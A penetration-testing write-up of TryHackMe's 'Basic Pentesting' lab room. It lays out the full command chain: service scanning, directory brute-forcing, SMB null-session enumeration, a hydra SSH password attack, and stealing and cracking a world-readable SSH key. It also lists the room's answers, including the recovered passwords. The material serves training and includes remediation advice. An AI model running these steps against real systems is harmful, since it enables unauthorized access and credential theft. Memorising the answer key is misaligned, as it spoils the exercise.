A full engagement walkthrough of the Basic Pentesting room on TryHackMe, documented in a VAPT-report style — reconnaissance through to full compromise. The attack chain moves from service discovery, through web and SMB enumeration, to an SSH foothold via password brute-forcing, and finally privilege escalation by stealing and cracking a world-readable SSH private key.
| Room | Basic Pentesting |
| Platform | TryHackMe |
| Difficulty | Easy |
| Target IP | 10.49.129.42 |
| Target OS | Ubuntu Linux (Samba host BASIC2, WORKGROUP) |
| Objective | Compromise the host and recover the final stored credential |
| Tester | Aihik Chakraborty (github.com/Aihikk) |
| Environment | Kali Linux 2025.4 (VMware) over TryHackMe VPN |
Note: TryHackMe assigns a fresh IP on every deploy. This engagement used
10.49.129.42; substitute your own if you replay the room.
The target was fully compromised through a chain of common misconfigurations rather than a single critical exploit. An exposed web directory (/development) leaked two user initials and a note confirming that one account used a weak, already-cracked password. SMB enumeration resolved the actual usernames (jan, kay). A dictionary attack against SSH recovered jan's password, granting an initial foothold. From there, kay's SSH private key was found with insecure (world-readable) permissions, exfiltrated, and its passphrase cracked offline — yielding access to kay and the final stored credential in pass.bak.
Result: Initial access as jan → lateral movement to kay → recovery of the final password.
| # | Finding | Severity |
|---|---|---|
| 1 | Weak, dictionary-guessable SSH password (jan) |
High |
| 2 | World-readable SSH private key in another user's home directory | High |
| 3 | Weak passphrase on SSH private key (present in rockyou.txt) |
High |
| 4 | Sensitive information disclosure via exposed /development directory |
Medium |
| 5 | SMB null-session user and share enumeration | Medium |
nmap · gobuster · enum4linux · smbclient · hydra · ssh / scp · ssh2john · john
A service/version scan against the target:
nmap -sV 10.49.129.42Six open ports are returned:
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 |
| 80 | HTTP | Apache httpd 2.4.41 (Ubuntu) |
| 139 | NetBIOS-SSN | Samba smbd 4 |
| 445 | Microsoft-DS | Samba smbd 4 |
| 8009 | AJP13 | Apache Jserv (Protocol v1.3) |
| 8080 | HTTP | Apache Tomcat 9.0.7 |
Takeaway: two web surfaces (80, 8080), SMB (139/445), and SSH (22). SMB + SSH together signal a classic enumerate users → brute-force path.
gobuster dir -u http://10.49.129.42/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtGobuster discovers a hidden directory:
/development (Status: 301) [--> http://10.49.129.42/development/]
Browsing http://10.49.129.42/development/ reveals an open directory index containing two plaintext notes — dev.txt and j.txt:
2018-04-23: ...messing with that struts stuff... using version 2.5.12... -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
The notes are signed by two users, K and J, and disclose that the server runs Apache Struts 2.5.12.
For J:
I've been auditing the contents of /etc/shadow... and I was able to crack
your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
This is the critical lead: J's password is weak and crackable, directing the attack toward brute-forcing that account.
With 139/445 open, enumerate SMB to resolve the real usernames behind "J" and "K".
enum4linux 10.49.129.42The scan runs through workgroup, nbtstat, and session checks:
It confirms the host is a Samba Server 4.15.13-Ubuntu (BASIC2, WORKGROUP) and enumerates shares via a null session:
Crucially, RID cycling resolves the local users:
S-1-22-1-1000 Unix User\kay
S-1-22-1-1001 Unix User\jan
S-1-22-1-1002 Unix User\ubuntu
This confirms jan = "J" (the weak account) and kay = "K".
The Anonymous share allows a null session. Listing it exposes a staff.txt file:
smbclient //10.49.129.42/Anonymous -N
smb: \> ls
smb: \> get staff.txtReading staff.txt:
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all
in fun, but this is how mistakes happen. (This means you too, Jan!)
-Kay
This reinforces that jan and kay are the active users, with jan repeatedly flagged as the careless one.
Given the confirmed hint that jan uses a weak password, run a targeted dictionary attack against SSH:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.49.129.42Hydra recovers valid credentials:
[22][ssh] host: 10.49.129.42 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Credentials obtained: jan : armando
Authenticate over SSH with the recovered credentials:
ssh jan@10.49.129.42
# password: armandoThe host key is accepted and the jan session is established:
Foothold confirmed — we land in jan's shell:
Enumerating /home, a second user directory kay contains a pass.bak file — but jan cannot read it:
cd /home/kay
ls -la
cat pass.bak # → Permission deniedpass.bak is owned by kay with -rw------- permissions. However, kay's .ssh directory is world-readable, exposing the private key id_rsa:
cd /home/kay/.ssh
ls -la
# -rw-r--r-- 1 kay kay 3326 id_rsa <-- readable by everyoneMisconfiguration identified: a private SSH key readable by other local users — the pivot point to kay.
Inspecting the key shows it is passphrase-protected (Proc-Type: 4,ENCRYPTED), so it can't be used directly:
Pull the key to the attacker box (SCP, or copy its contents), then convert it to a John-compatible hash:
chmod 600 id_rsa
ssh2john id_rsa > hash.txt
cat hash.txtCrack the passphrase offline with rockyou.txt:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtJohn recovers the passphrase almost instantly:
beeswax (id_rsa)
1g 0:00:00:00 DONE ... Session completed.
Obtained: kay's private key + passphrase beeswax.
Note: when capturing the key by copy-paste out of the terminal,
ssh2johnmay report "id_rsa is not a valid private key file" — the paste drops or mangles the-----BEGIN/END-----lines. Transferring viascpavoids this by copying the file byte-for-byte.
Log in as kay using the cracked key and passphrase:
ssh -i id_rsa kay@10.49.129.42
# Enter passphrase for key 'id_rsa': beeswaxNow authenticated as kay, read the previously locked file:
cat pass.bakheresareallystrongpasswordthatfollowsthepasswordpolicy$$
Objective achieved — the final stored credential is recovered and the box is compromised end to end.
nmap (6 ports: 22,80,139,445,8009,8080)
└─> gobuster → /development (dev.txt: Struts 2.5.12 | j.txt: "J has weak password")
└─> enum4linux → users jan, kay, ubuntu + smbclient Anonymous → staff.txt
└─> hydra ssh (jan) → jan:armando [ INITIAL ACCESS ]
└─> /home/kay: pass.bak locked, but .ssh/id_rsa world-readable
└─> ssh2john + john → passphrase: beeswax
└─> ssh -i id_rsa kay → cat pass.bak [ FULL COMPROMISE ]
| # | Finding | Impact | Remediation |
|---|---|---|---|
| 1 | Weak SSH password — jan:armando found in rockyou.txt |
Direct remote foothold via brute force | Enforce a strong password policy; deploy fail2ban/rate-limiting; prefer key-based auth and disable SSH password login. |
| 2 | World-readable SSH private key — /home/kay/.ssh/id_rsa readable by all users |
Any local user can steal the key and impersonate kay |
Set chmod 600 on private keys and 700 on .ssh; audit home-directory permissions. |
| 3 | Weak key passphrase — beeswax cracked offline from rockyou.txt |
Defeats the last protection on a stolen key | Use long, random passphrases; rotate any exposed key immediately. |
| 4 | Information disclosure — /development exposed users + a password-strength hint |
Hands an attacker usernames and attack direction | Remove sensitive notes from web roots; disable directory listing (Options -Indexes); restrict access. |
| 5 | SMB null-session enumeration — enum4linux/smbclient listed users and the Anonymous share |
Confirms valid usernames and leaks internal notes | Restrict anonymous SMB access; set restrict anonymous; remove unneeded shares. |
| Task question | Answer |
|---|---|
| Hidden directory on the web server | development |
| Username (from enumeration) | jan |
| Password (brute-forced) | armando |
| Service used to gain access (abbreviation, caps) | SSH |
| Other user found | kay |
| What to do with the id_rsa found | Crack its passphrase to log in as kay |
| SSH key passphrase | beeswax |
| Final password obtained | heresareallystrongpasswordthatfollowsthepasswordpolicy$$ |
- Enumeration drives everything. The whole chain unlocked from two text files and a user list — no exploit code required. Breadth of recon (web and SMB) is what connected the dots.
- Permissions are a privilege-escalation surface. The pivot to
kayhinged on one over-permissive.sshdirectory — file-permission hygiene matters as much as patching. - Offline cracking defeats "protected" keys. A passphrase only helps if it isn't sitting in a wordlist.
- Prefer SCP over copy-paste for keys to avoid the
ssh2john"not a valid private key" trap.
This report documents work performed against a deliberately vulnerable, authorized training machine on TryHackMe within an isolated lab. The techniques shown are for educational and defensive-awareness purposes only. Never test systems you do not own or have explicit written permission to assess.


















